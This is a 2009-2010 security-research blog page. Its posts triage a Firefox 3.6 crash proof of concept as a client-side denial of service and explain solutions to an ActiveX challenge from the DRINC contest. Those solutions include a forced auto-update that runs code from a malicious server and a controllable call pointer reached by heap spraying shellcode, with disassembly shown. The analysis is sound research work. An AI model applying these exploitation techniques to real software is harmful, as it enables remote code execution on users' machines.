Ferm�n J. Serna - Zhodiac - Vast and Infinite Net Dreams...

Firefox 3.6 vulnerability... exploitable?

Fermin J. Serna - Zhodiac — Mon, 25 Jan 2010 11:34:18 +0100

I was reading the RSS feeds I am subscribed to and found this Firefox 3.6 proof of concept.

A brief scan on the poc looks like an invalid xml file with 30k nested children...
Once I was sure the PoC was clean with no malicious code, I opened windbg and tested it.

Crash is as follows:

xul!NS_Realloc_P+0x3f63:
61b11333 53              push    ebx
0:000> r
eax=00000000 ebx=0e45b800 ecx=0d252680 edx=0d926490 esi=00000000 edi=0d86fb48
eip=61b11333 esp=00052ffc ebp=00000000 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
xul!NS_Realloc_P+0x3f63:
61b11333 53              push    ebx
0:000> kPn
 # ChildEBP RetAddr
00 00000000 00000000 xul!NS_Realloc_P+0x3f63
0:000> q

It is a stack recursion bug... so I do not think we should consider this more than a client side DoS.

Zhodiac || Fermin

DRINC solutions (AwesomeX.ocx)

Fermin J. Serna - Zhodiac — Wed, 06 Jan 2010 12:50:18 +0100

Some time ago I sent to the DVlabs guys the solutions to one of the unsolved challenges at ekoparty.

Time has passed and here are both simple solutions. Funny these were not caught since they are some simple and easy to spot...

* Flaw #1

Using Javascript you can instantiate this control and force it to
autoupdate from a malicious web server, the only check is a magic flag
(54535254h)
It will download the update and execute it... (c:awesomex_update_latest.exe)

Of course it also has problems with MITM, DNS poisoning... on legit
sites using a site-locked activex control.

int Download_updates(LPCWSTR lpszServerName, int flag)

The flag comparison is performed at:

.text:100018DD                 cmp     [ebp+flag], 54535254h

* Flaw #2:

On DoFancyStuff (callable through JS) the first argument is a VT_UI4.
There are several checks to see if it is word aligned and below
0x30000000. And then, after some fancy stuff malloc/memcpy, we will
give control to that (address*2)+0x14h..

.text:10001B87                 mov     eax, [ebp+pointer]
.text:10001B8A                 test    al, 3
.text:10001B8C                 jnz     loc_10001C34
.text:10001B92                 lea     ecx, [eax+eax]
.text:10001B95                 cmp     ecx, 60000000h
.text:10001B9B                 ja      loc_10001C34
.text:10001BA1                 test    eax, eax
[...]
.text:10001BAB                 lea     esi, [eax+14h]
[...]
.text:10001C2F                 call    esi

With heap spraying we can control that address... and place a shellcode there.

On other things, please note the website address has changed and the new one is http://zhodiac.hispahack.com with the new rss feed http://zhodiac.hispahack.com/rss.php. Old rss will stop working shortly.

Zhodiac || Fermin

EMET

Fermin J. Serna - Zhodiac — Fri, 30 Oct 2009 11:52:56 +0100

I'm not going to copy & paste the blog post... You can read it here...

http://blogs.technet.com/srd/archive/2009/10/27/announcing-the-release-of-the-enhanced-mitigation-evaluation-toolkit.aspx

Basically, it is a framework/tool for testing mitigations, even on downlevel OS, we wrote at Microsoft. Special thanks to Andrew Roths and Matt Miller.

Zhodiac || Fermin

DVlabs DRINC Challenge

Fermin J. Serna - Zhodiac — Thu, 01 Oct 2009 11:43:44 +0200

Looks like there was some DRINC challenges unsolved at Ekoparty 2009... Congrats Gera for solving most of them and winning the champagne.

Yesterday, I took a look at the ActiveX one and found the two left issues. Easy ones :)

Still left two vulnerabilities at the SecureLoggingServer binary. Hopefully next week I will have some free time for it if it is still unsolved.

Zhodiac || Fermin